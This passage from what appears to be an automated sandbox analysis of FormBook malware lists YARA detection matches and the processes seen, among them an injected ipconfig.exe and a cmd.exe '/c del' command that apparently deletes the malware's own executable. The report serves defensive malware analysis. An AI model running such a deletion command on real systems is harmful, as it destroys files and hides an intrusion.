                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: moderate

                                          General

                                          Start time: 08:28:29
                                          Start date: 26/11/2020
                                          Path: C:\Windows\explorer.exe
                                          Wow64 process (32bit): false
                                          Commandline:
                                          Imagebase: 0x7ff6f22f0000
                                          File size: 3933184 bytes
                                          MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: high

                                          General

                                          Start time: 08:28:43
                                          Start date: 26/11/2020
                                          Path: C:\Windows\SysWOW64\ipconfig.exe
                                          Wow64 process (32bit): true
                                          Commandline: C:\Windows\SysWOW64\ipconfig.exe
                                          Imagebase: 0xe30000
                                          File size: 29184 bytes
                                          MD5 hash: B0C7423D02A007461C850CD0DFE09318
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: moderate

                                          General

                                          Start time: 08:28:48
                                          Start date: 26/11/2020
                                          Path: C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit): true
                                          Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
                                          Imagebase: 0x2a0000
                                          File size: 232960 bytes
                                          MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: high

                                          General

                                          Start time: 08:28:51
                                          Start date: 26/11/2020
                                          Path: C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit): false
                                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase: 0x7ff61de10000
                                          File size: 625664 bytes
                                          MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: high

                                          Disassembly

                                          Code Analysis
